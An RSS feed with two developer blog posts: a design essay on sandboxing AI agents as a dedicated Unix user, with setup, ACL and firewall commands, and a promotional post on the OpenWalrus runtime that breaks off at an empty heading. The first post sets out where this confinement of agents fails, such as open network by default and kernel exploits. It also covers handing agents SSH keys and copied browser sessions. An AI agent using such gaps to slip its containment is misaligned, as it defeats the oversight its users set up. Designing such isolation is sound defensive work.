<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: CrabTalk</title>
    <description>The latest articles on Forem by CrabTalk (@crabtalk).</description>
    <link>https://forem.com/crabtalk</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Forganization%2Fprofile_image%2F12670%2F193db0b4-577b-4751-b7d8-4fc5428ae2b4.png</url>
      <title>Forem: CrabTalk</title>
      <link>https://forem.com/crabtalk</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/crabtalk"/>
    <language>en</language>
    <item>
      <title>Workspace as sandbox: a simpler model for agent isolation</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:56:31 +0000</pubDate>
      <link>https://forem.com/crabtalk/workspace-as-sandbox-a-simpler-model-for-agent-isolation-33pd</link>
      <guid>https://forem.com/crabtalk/workspace-as-sandbox-a-simpler-model-for-agent-isolation-33pd</guid>
      <description>&lt;p&gt;The &lt;a href="https://openwalrus.xyz/blog/agent-sandbox-permissions" rel="noopener noreferrer"&gt;sandbox survey&lt;/a&gt; found that every&lt;br&gt;
production agent system either gates individual commands (Claude Code,&lt;br&gt;
Cursor, Codex CLI) or gates the environment (Devin, OpenHands). Both&lt;br&gt;
have real tradeoffs. Per-command approval interrupts flow. Container&lt;br&gt;
isolation cuts agents off from the host resources that make them useful&lt;br&gt;
— especially authenticated browser sessions.&lt;/p&gt;

&lt;p&gt;There's a third option hiding in the operating system itself: &lt;strong&gt;make the&lt;br&gt;
agent a real OS user, and keep the runtime completely unaware of it.&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  The model
&lt;/h2&gt;

&lt;p&gt;One system user — &lt;code&gt;walrus&lt;/code&gt; — is the agent's identity. All agents, all&lt;br&gt;
tasks, all workspaces live under this user's home directory. The walrus&lt;br&gt;
runtime runs as this user. Standard Unix file permissions enforce the&lt;br&gt;
boundary. No Landlock, no seccomp, no sandbox library in the runtime&lt;br&gt;
code. Zero lines of sandbox logic.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/workspace-sandbox-design" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The human user (&lt;code&gt;alice&lt;/code&gt;) decides what the agent can see by setting ACLs&lt;br&gt;
on her own files or copying resources into the workspace's &lt;code&gt;shared/&lt;/code&gt;&lt;br&gt;
directory. The agent can't read anything outside its home unless &lt;code&gt;alice&lt;/code&gt;&lt;br&gt;
explicitly grants access. This isn't a new abstraction — it's how Unix&lt;br&gt;
has worked since the 1970s.&lt;/p&gt;
&lt;h2&gt;
  
  
  Why zero sandbox logic in the runtime
&lt;/h2&gt;
&lt;h3&gt;
  
  
  The sandbox is the OS, not the code
&lt;/h3&gt;

&lt;p&gt;Claude Code, Cursor, and Codex CLI all embed sandbox logic in their&lt;br&gt;
runtimes — generating Seatbelt profiles, configuring Landlock rules,&lt;br&gt;
writing seccomp BPF programs. This means maintaining three platform-&lt;br&gt;
specific implementations, debugging sandbox policy issues, and&lt;br&gt;
accepting the security risk of bugs in their own sandbox code.&lt;/p&gt;

&lt;p&gt;The OS user model sidesteps all of this. The runtime doesn't know or&lt;br&gt;
care about sandboxing. It runs as &lt;code&gt;walrus&lt;/code&gt;, and the OS handles isolation.&lt;br&gt;
File permissions, process ownership, resource limits — these are kernel-&lt;br&gt;
enforced mechanisms that have been audited for decades. No sandbox code&lt;br&gt;
to write means no sandbox bugs to ship.&lt;/p&gt;
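&lt;p&gt;These kernel mechanisms are observable with nothing but a shell. A minimal illustration (generic Unix, throwaway paths, no walrus setup required):&lt;/p&gt;

```shell
# Kernel-enforced boundaries, demonstrated without any sandbox library.

# File permissions: mode 700 means only the owner passes the kernel's
# permission check at open(2) -- this is the workspace boundary.
mkdir -p /tmp/demo-home
chmod 700 /tmp/demo-home
perms=$(ls -ld /tmp/demo-home | cut -c1-10)

# Resource limits: the kernel caps this subshell's open file descriptors.
fd_cap=$( (ulimit -n 64; ulimit -n) )
```

&lt;p&gt;Run as the &lt;code&gt;walrus&lt;/code&gt; user, the same two primitives bound what every agent process can touch.&lt;/p&gt;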
&lt;h3&gt;
  
  
  Cross-platform for free
&lt;/h3&gt;

&lt;p&gt;Unix file permissions work identically on macOS, Linux, and every BSD.&lt;br&gt;
No platform-specific sandbox implementation to maintain. No Seatbelt on&lt;br&gt;
macOS, Landlock on Linux, WSL2 workarounds on Windows. The same model,&lt;br&gt;
the same commands, the same behavior everywhere.&lt;/p&gt;
&lt;h3&gt;
  
  
  Pluggable setup, not pluggable runtime
&lt;/h3&gt;

&lt;p&gt;The sandbox setup — creating the user, configuring firewall rules,&lt;br&gt;
setting ACLs — is a one-time operation that happens outside the runtime.&lt;br&gt;
This makes it &lt;strong&gt;pluggable by design&lt;/strong&gt;: &lt;code&gt;walrus sandbox init&lt;/code&gt; is just a&lt;br&gt;
command that wraps the platform-specific setup steps. Anyone can write&lt;br&gt;
their own init script, customize the user configuration, add network&lt;br&gt;
rules, or skip the whole thing. The runtime doesn't change.&lt;/p&gt;
&lt;h2&gt;
  
  
  &lt;code&gt;walrus sandbox init&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;A single command that sets up the OS user and workspace structure.&lt;br&gt;
Requires sudo once, then never again.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox init
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; password &lt;span class="k"&gt;for &lt;/span&gt;alice:
Creating system user &lt;span class="s1"&gt;'walrus'&lt;/span&gt;...
  macOS: sysadminctl &lt;span class="nt"&gt;-addUser&lt;/span&gt; _walrus &lt;span class="nt"&gt;-home&lt;/span&gt; /var/walrus &lt;span class="nt"&gt;-shell&lt;/span&gt; /bin/bash
  Linux: useradd &lt;span class="nt"&gt;--system&lt;/span&gt; &lt;span class="nt"&gt;--home&lt;/span&gt; /var/walrus &lt;span class="nt"&gt;--shell&lt;/span&gt; /bin/bash walrus
Creating home directory /var/walrus/
Creating /var/walrus/workspaces/
Creating /var/walrus/.runtimes/
Done. All walrus agents will now run as user &lt;span class="s1"&gt;'walrus'&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. No LaunchDaemon, no systemd unit, no firewall rules by&lt;br&gt;
default. The init command does the minimum: create the user, create the&lt;br&gt;
home directory. Everything else is optional and additive.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/workspace-sandbox-design" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  What init does NOT do
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;No network firewall rules (opt-in via &lt;code&gt;walrus sandbox network init&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;No runtime service/daemon installation (opt-in via &lt;code&gt;walrus sandbox service init&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;No Chrome profile copying (the user does this manually or via a share command)&lt;/li&gt;
&lt;li&gt;No Landlock/seccomp/Seatbelt configuration (the OS user &lt;em&gt;is&lt;/em&gt; the sandbox)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each of these is a separate, optional command. The runtime works the&lt;br&gt;
same regardless of which you've run. This is the&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;less code, more skills&lt;/a&gt; principle applied&lt;br&gt;
to infrastructure: the runtime is minimal, the setup is extensible.&lt;/p&gt;
&lt;h3&gt;
  
  
  Without init
&lt;/h3&gt;

&lt;p&gt;If the user never runs &lt;code&gt;walrus sandbox init&lt;/code&gt;, the runtime runs as the&lt;br&gt;
current user — same as Claude Code or Aider today. No isolation, no&lt;br&gt;
friction. The sandbox is purely opt-in. The runtime code path is&lt;br&gt;
identical either way.&lt;/p&gt;
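&lt;p&gt;Because the code path is identical, "am I sandboxed?" reduces to "which user am I?", which a wrapper script can answer without any runtime support. A sketch (user names follow the init transcript above; the script itself is illustrative, not shipped code):&lt;/p&gt;

```shell
# Illustrative check: isolation is a property of the invoking user,
# not of the runtime binary.
current_user=$(id -un)
case "$current_user" in
  walrus|_walrus) echo "isolated: OS-user sandbox active" ;;
  *)              echo "no isolation: running as $current_user" ;;
esac
```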
&lt;h2&gt;
  
  
  Sharing host resources
&lt;/h2&gt;

&lt;p&gt;The human user and the agent need to exchange files. The mechanisms&lt;br&gt;
depend on the resource type.&lt;/p&gt;
&lt;h3&gt;
  
  
  Project files: ACLs
&lt;/h3&gt;

&lt;p&gt;The user grants the &lt;code&gt;walrus&lt;/code&gt; user access to a project directory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# macOS&lt;/span&gt;
&lt;span class="nb"&gt;chmod&lt;/span&gt; +a &lt;span class="s2"&gt;"walrus allow read,write,execute,delete,add_file,add_subdirectory"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    ~/projects/my-app

&lt;span class="c"&gt;# Linux&lt;/span&gt;
setfacl &lt;span class="nt"&gt;-R&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; u:walrus:rwx ~/projects/my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No root needed — the file owner sets ACLs on their own files. The agent&lt;br&gt;
reads and writes the project directory. &lt;code&gt;getfacl&lt;/code&gt; (Linux) or &lt;code&gt;ls -le&lt;/code&gt;&lt;br&gt;
(macOS) shows exactly what's shared.&lt;/p&gt;

&lt;p&gt;A convenience wrapper:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox share ~/projects/my-app
Granting walrus &lt;span class="nb"&gt;read&lt;/span&gt;/write access to /Users/alice/projects/my-app...
Done. The agent can now access this directory.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Credentials: read-only ACLs
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox share &lt;span class="nt"&gt;--read-only&lt;/span&gt; ~/.ssh/id_ed25519
Granting walrus read-only access to /Users/alice/.ssh/id_ed25519...
Done.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The agent can use the SSH key but can't modify or delete it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Browser profiles: copy into workspace
&lt;/h3&gt;

&lt;p&gt;For resources that can't be safely shared concurrently, copy them:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox share &lt;span class="nt"&gt;--copy&lt;/span&gt; ~/.config/google-chrome/Profile&lt;span class="se"&gt;\ &lt;/span&gt;1 &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--into&lt;/span&gt; workspaces/task-42/chrome-profile

Copying Chrome profile into /var/walrus/workspaces/task-42/chrome-profile/...
Using reflink &lt;span class="o"&gt;(&lt;/span&gt;copy-on-write&lt;span class="o"&gt;)&lt;/span&gt;... Done.

&lt;span class="c"&gt;# The agent launches Chrome with its own copy:&lt;/span&gt;
chrome &lt;span class="nt"&gt;--headless&lt;/span&gt; &lt;span class="nt"&gt;--user-data-dir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/var/walrus/workspaces/task-42/chrome-profile/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The agent starts with the user's session state (cookies, saved logins)&lt;br&gt;
but changes are isolated. Two agents get independent copies. On Btrfs or XFS&lt;br&gt;
(Linux), GNU &lt;code&gt;cp --reflink=auto&lt;/code&gt; makes this near-instant; on APFS (macOS),&lt;br&gt;
BSD &lt;code&gt;cp -c&lt;/code&gt; clones via &lt;code&gt;clonefile(2)&lt;/code&gt;.&lt;/p&gt;
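&lt;p&gt;The fallback behavior is what makes this safe to script: with &lt;code&gt;--reflink=auto&lt;/code&gt;, GNU &lt;code&gt;cp&lt;/code&gt; clones when the filesystem supports it and quietly does a full copy when it doesn't. A toy version of the copy step (throwaway paths, GNU coreutils assumed):&lt;/p&gt;

```shell
# Copy-on-write clone of a profile directory; falls back to a plain
# copy on filesystems without reflink support.
mkdir -p /tmp/src-profile
printf 'session cookies\n' > /tmp/src-profile/state
cp -R --reflink=auto /tmp/src-profile /tmp/task-42-profile

# The copy is independent: mutating it leaves the original untouched.
printf 'agent changes\n' > /tmp/task-42-profile/state
```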
&lt;h3&gt;
  
  
  Listing and revoking
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox shared
/Users/alice/projects/my-app        read-write
/Users/alice/.ssh/id_ed25519        read-only
&lt;span class="o"&gt;(&lt;/span&gt;copied&lt;span class="o"&gt;)&lt;/span&gt; chrome-profile → task-42   isolated copy

&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox unshare ~/projects/my-app
Revoking walrus access to /Users/alice/projects/my-app...
Done.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h2&gt;
  
  
  Where it breaks
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Network isolation is separate
&lt;/h3&gt;

&lt;p&gt;Unix file permissions don't restrict network access. The &lt;code&gt;walrus&lt;/code&gt; user&lt;br&gt;
can &lt;code&gt;curl&lt;/code&gt; anything by default. For network control, you need additional&lt;br&gt;
setup:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox network init
Setting up per-user firewall rules &lt;span class="k"&gt;for &lt;/span&gt;walrus...
  Linux: iptables &lt;span class="nt"&gt;-A&lt;/span&gt; OUTPUT &lt;span class="nt"&gt;-m&lt;/span&gt; owner &lt;span class="nt"&gt;--uid-owner&lt;/span&gt; walrus &lt;span class="nt"&gt;-j&lt;/span&gt; DROP
  macOS: adding pf rule &lt;span class="k"&gt;for &lt;/span&gt;user _walrus
Default: deny all outbound. Configure allowlist &lt;span class="k"&gt;in&lt;/span&gt; ~/.walrus/network.toml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is a separate, optional init step. The runtime doesn't enforce&lt;br&gt;
network policy — it delegates to the OS firewall. If the user hasn't&lt;br&gt;
run &lt;code&gt;walrus sandbox network init&lt;/code&gt;, network is unrestricted.&lt;/p&gt;
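&lt;p&gt;The post doesn't pin down the allowlist format. One plausible shape for &lt;code&gt;~/.walrus/network.toml&lt;/code&gt;, with field names that are purely illustrative:&lt;/p&gt;

```toml
# Hypothetical ~/.walrus/network.toml -- default-deny with named exceptions.
default = "deny"

# Each allow rule punches one hole in the per-user firewall.
[[allow]]
host = "api.anthropic.com"
port = 443

[[allow]]
host = "github.com"
port = 443
```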
&lt;h3&gt;
  
  
  Process-level resources
&lt;/h3&gt;

&lt;p&gt;Some host resources aren't files. Display access, GPU, audio, D-Bus&lt;br&gt;
sessions — a separate OS user doesn't get these automatically.&lt;/p&gt;

&lt;p&gt;For headless browser automation (CDP), this is fine — headless Chrome&lt;br&gt;
doesn't need a display. For visual Computer Use, the user would need to&lt;br&gt;
grant display access:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# X11&lt;/span&gt;
xhost +SI:localuser:walrus

&lt;span class="c"&gt;# Or run a virtual framebuffer under the walrus user&lt;/span&gt;
Xvfb :99 &amp;amp;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;DISPLAY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;:99
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is additional setup, not something the runtime handles.&lt;/p&gt;

&lt;h3&gt;
  
  
  The sudo prompt
&lt;/h3&gt;

&lt;p&gt;Creating an OS user requires root. Every developer tool that creates&lt;br&gt;
service accounts does this — Docker, Postgres, MySQL — but it's still&lt;br&gt;
a friction point for "download and run" tooling.&lt;/p&gt;

&lt;p&gt;The design makes this explicitly opt-in: &lt;code&gt;walrus sandbox init&lt;/code&gt; is a&lt;br&gt;
separate command, not part of &lt;code&gt;walrus install&lt;/code&gt;. Without it, walrus runs&lt;br&gt;
as the current user with no isolation. The sudo prompt only appears when&lt;br&gt;
the user actively chooses isolation.&lt;/p&gt;

&lt;h3&gt;
  
  
  Kernel isolation is shallow
&lt;/h3&gt;

&lt;p&gt;Like every other local sandbox approach (Landlock, Seatbelt, user&lt;br&gt;
namespaces), the OS user shares the host kernel. A kernel exploit&lt;br&gt;
escalates to root. For local developer tooling the threat model is&lt;br&gt;
"agent does something unintended" — acceptable. For multi-tenant&lt;br&gt;
platforms running untrusted agent code, not acceptable.&lt;/p&gt;

&lt;h2&gt;
  
  
  The design principle
&lt;/h2&gt;

&lt;p&gt;The walrus runtime has zero sandbox logic. The sandbox is the operating&lt;br&gt;
system. Setup is a pluggable command that runs once. Every &lt;code&gt;walrus sandbox share&lt;/code&gt;&lt;br&gt;
and &lt;code&gt;walrus sandbox unshare&lt;/code&gt; command is just a thin wrapper around &lt;code&gt;setfacl&lt;/code&gt; /&lt;br&gt;
&lt;code&gt;chmod +a&lt;/code&gt;. The runtime doesn't check ACLs, doesn't enforce policies,&lt;br&gt;
doesn't generate sandbox profiles. It runs as whatever user launched it&lt;br&gt;
— if that user is &lt;code&gt;walrus&lt;/code&gt;, isolation exists. If not, it doesn't.&lt;/p&gt;

&lt;p&gt;This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No sandbox bugs in the runtime.&lt;/strong&gt; The attack surface is the OS kernel,
not our code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No platform-specific code paths.&lt;/strong&gt; The same runtime binary works on
macOS and Linux.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No configuration to get wrong.&lt;/strong&gt; The sandbox is either set up
(user exists) or it isn't. No SBPL profiles, no BPF programs, no
TOML policy files that the runtime interprets.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Full user control.&lt;/strong&gt; The human user decides what to share using
standard Unix tools. They can inspect, modify, or revoke permissions
at any time without touching the walrus runtime.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Prior art
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://github.com/webcoyote/sandvault" rel="noopener noreferrer"&gt;Sandvault&lt;/a&gt; is the clearest&lt;br&gt;
prior art — a macOS tool that creates a per-human-user agent account&lt;br&gt;
and runs commands via &lt;code&gt;ssh sandvault-$USER@localhost&lt;/code&gt;, adding Seatbelt&lt;br&gt;
restrictions on top.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://medium.com/nttlabs/alcoholless-a-lightweight-security-sandbox-for-macos-programs-homebrew-ai-agents-etc-ccf0d1927301" rel="noopener noreferrer"&gt;Alcoholless&lt;/a&gt;&lt;br&gt;
(NTT Labs) runs programs as a separate macOS user, syncing changed files&lt;br&gt;
back on exit.&lt;/p&gt;

&lt;p&gt;Both add runtime sandbox logic on top of the OS user. Our design&lt;br&gt;
intentionally doesn't — the OS user &lt;em&gt;is&lt;/em&gt; the entire sandbox layer.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;One walrus user or one per human user?&lt;/strong&gt; A single system-wide &lt;code&gt;walrus&lt;/code&gt;&lt;br&gt;
user is simpler. But on a shared machine, Alice's agent and Bob's agent&lt;br&gt;
would share a home directory. Per-human-user accounts (&lt;code&gt;walrus-alice&lt;/code&gt;,&lt;br&gt;
&lt;code&gt;walrus-bob&lt;/code&gt;) provide isolation but multiply setup complexity. Sandvault&lt;br&gt;
chose per-human-user. For a single-developer machine (the primary walrus&lt;br&gt;
use case), one user seems right.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should &lt;code&gt;walrus sandbox share&lt;/code&gt; wrap ACLs or teach ACLs?&lt;/strong&gt; A wrapper command is&lt;br&gt;
more convenient. But it hides what's happening, and users may not know&lt;br&gt;
how to debug permissions. An alternative: &lt;code&gt;walrus sandbox share&lt;/code&gt; prints the&lt;br&gt;
raw &lt;code&gt;setfacl&lt;/code&gt; / &lt;code&gt;chmod +a&lt;/code&gt; command and asks the user to run it. Full&lt;br&gt;
transparency, slightly more friction.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How do &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;skills&lt;/a&gt; declare resource needs?&lt;/strong&gt;&lt;br&gt;
A skill that needs Chrome access could declare &lt;code&gt;needs: [browser]&lt;/code&gt; in its&lt;br&gt;
metadata. Before running the skill, the runtime checks whether a Chrome&lt;br&gt;
profile exists in the workspace. If not, it prompts: "This skill needs&lt;br&gt;
a browser profile. Run &lt;code&gt;walrus sandbox share --copy &amp;lt;path&amp;gt;&lt;/code&gt; to provide one."&lt;br&gt;
The runtime doesn't &lt;em&gt;enforce&lt;/em&gt; — it &lt;em&gt;informs&lt;/em&gt;.&lt;/p&gt;
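&lt;p&gt;Concretely, the declaration could sit in the skill's metadata file. Everything below is a sketch extrapolated from the &lt;code&gt;needs: [browser]&lt;/code&gt; example; no such schema is defined yet:&lt;/p&gt;

```yaml
# Hypothetical skill metadata -- the runtime informs, it never enforces.
name: check-flight-prices
needs: [browser]   # satisfied by a Chrome profile copied into the workspace
# If the workspace has no chrome-profile/ directory, the runtime prints the
# `walrus sandbox share --copy` hint instead of failing.
```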

&lt;p&gt;&lt;strong&gt;Is the no-sandbox fallback good enough?&lt;/strong&gt; Without &lt;code&gt;walrus sandbox init&lt;/code&gt;,&lt;br&gt;
the agent runs as the current user with full access. This matches Aider's&lt;br&gt;
model and what most developers do today. But it means the default is&lt;br&gt;
zero isolation. Should walrus warn on every run without sandbox init?&lt;br&gt;
Or is that the kind of nag that teaches users to ignore warnings?&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/agent-sandbox-permissions" rel="noopener noreferrer"&gt;Sandboxing AI agents: beyond Docker and WASM&lt;/a&gt;
— the survey this design responds to&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/webcoyote/sandvault" rel="noopener noreferrer"&gt;Sandvault&lt;/a&gt; — prior art for
OS-user-based agent sandboxing on macOS&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://medium.com/nttlabs/alcoholless-a-lightweight-security-sandbox-for-macos-programs-homebrew-ai-agents-etc-ccf0d1927301" rel="noopener noreferrer"&gt;Alcoholless&lt;/a&gt;
— NTT Labs' separate-user sandbox for macOS&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://cursor.com/blog/agent-sandboxing" rel="noopener noreferrer"&gt;Cursor Agent Sandboxing&lt;/a&gt;
— data showing environmental sandboxing increases agent autonomy&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;Less code, more skills&lt;/a&gt;
— the extension model and why sandbox config belongs in skill metadata&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/workspace-sandbox-design" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>architecture</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Why we built OpenWalrus</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:55:08 +0000</pubDate>
      <link>https://forem.com/crabtalk/why-we-built-openwalrus-5cmh</link>
      <guid>https://forem.com/crabtalk/why-we-built-openwalrus-5cmh</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Update (v0.0.7):&lt;/strong&gt; Local LLM inference was removed in v0.0.7. OpenWalrus now connects to remote providers (OpenAI, Claude, DeepSeek, Ollama). Memory and search are now external WHS services. The architectural arguments below still apply to the composable design.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;AI agent runtimes are exploding in popularity. But the most widely used open-source options share&lt;br&gt;
a set of problems that stem from one architectural decision: depending on cloud APIs for inference.&lt;/p&gt;

&lt;p&gt;We built OpenWalrus to prove there's a better way. Here's what's broken, and how local-first&lt;br&gt;
changes the equation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The token tax
&lt;/h2&gt;

&lt;p&gt;Cloud-based agent runtimes send every request to an external API. Every tool call, every&lt;br&gt;
reasoning step, every heartbeat consumes tokens — and tokens cost money.&lt;/p&gt;

&lt;p&gt;The numbers are staggering:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Based on community reports, power users spend &lt;strong&gt;$200–3,600/month&lt;/strong&gt; in API bills from normal agent usage&lt;/li&gt;
&lt;li&gt;Workspace files alone can &lt;a href="https://github.com/openclaw/openclaw/discussions/26472" rel="noopener noreferrer"&gt;waste 93.5% of the token budget&lt;/a&gt;,
leaving just 6.5% for actual work&lt;/li&gt;
&lt;li&gt;Scheduled tasks and heartbeats accumulate context across runs, burning tokens even when
the agent is idle — in one community report, heartbeats alone cost &lt;strong&gt;$50/day&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;A single stuck automation loop can &lt;a href="https://github.com/openclaw/openclaw/discussions/1949" rel="noopener noreferrer"&gt;run up hundreds of dollars overnight&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;OpenWalrus runs LLM inference in-process.&lt;/strong&gt; A built-in model registry with 20+ curated models&lt;br&gt;
auto-selects the right model and quantization for your hardware. There are no API calls, no&lt;br&gt;
token metering, and no usage-based billing. You can run agents 24/7 without worrying about a bill.&lt;/p&gt;

&lt;h2&gt;
  
  
  Security by neglect
&lt;/h2&gt;

&lt;p&gt;When your agent runtime talks to external APIs, it needs credentials. When it exposes a web&lt;br&gt;
interface, it needs authentication. When it supports third-party plugins, it needs vetting.&lt;br&gt;
Most cloud agent runtimes fail at all three.&lt;/p&gt;

&lt;p&gt;The track record speaks for itself:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A &lt;a href="https://www.kaspersky.com/blog/openclaw-vulnerabilities-exposed/55263/" rel="noopener noreferrer"&gt;security audit found 512 vulnerabilities&lt;/a&gt;,
eight classified as critical&lt;/li&gt;
&lt;li&gt;Over &lt;a href="https://www.bitsight.com/blog/openclaw-ai-security-risks-exposed-instances" rel="noopener noreferrer"&gt;224,000 agent instances are publicly accessible&lt;/a&gt;
on the open internet, with ~30% having no authentication and ~60% showing leaked credentials&lt;/li&gt;
&lt;li&gt;API keys are &lt;a href="https://github.com/openclaw/openclaw/discussions/26472" rel="noopener noreferrer"&gt;stored in plaintext&lt;/a&gt;
with no encryption&lt;/li&gt;
&lt;li&gt;A one-click remote code execution vulnerability (&lt;a href="https://www.darkreading.com/application-security/critical-openclaw-vulnerability-ai-agent-risks" rel="noopener noreferrer"&gt;CVE-2026-25253&lt;/a&gt;)
allowed attackers to compromise instances via a single malicious link&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;OpenWalrus exposes no network services by default.&lt;/strong&gt; There are no API keys to leak because&lt;br&gt;
built-in inference doesn't need them. There are no ports left open, no web dashboards to&lt;br&gt;
misconfigure, and no credentials stored in plaintext.&lt;/p&gt;

&lt;h2&gt;
  
  
  Setup shouldn't be a project
&lt;/h2&gt;

&lt;p&gt;Getting a cloud agent runtime running often requires Docker, a gateway service, a database,&lt;br&gt;
and careful configuration. The reality:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/openclaw/openclaw/discussions/26472" rel="noopener noreferrer"&gt;Docker setup fails on fresh installations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Gateway services crash with &lt;code&gt;allowedOrigins&lt;/code&gt; errors on first startup&lt;/li&gt;
&lt;li&gt;Headless server deployments (EC2, VPS) fail due to display requirements&lt;/li&gt;
&lt;li&gt;The CLI is &lt;a href="https://github.com/openclaw/openclaw/discussions/26472" rel="noopener noreferrer"&gt;painfully slow on resource-constrained devices&lt;/a&gt;
like Raspberry Pi&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;OpenWalrus is a single binary.&lt;/strong&gt; Download it, run it. No Docker, no gateway, no database,&lt;br&gt;
no multi-service orchestration. It works on a fresh machine with zero dependencies.&lt;/p&gt;

&lt;h2&gt;
  
  
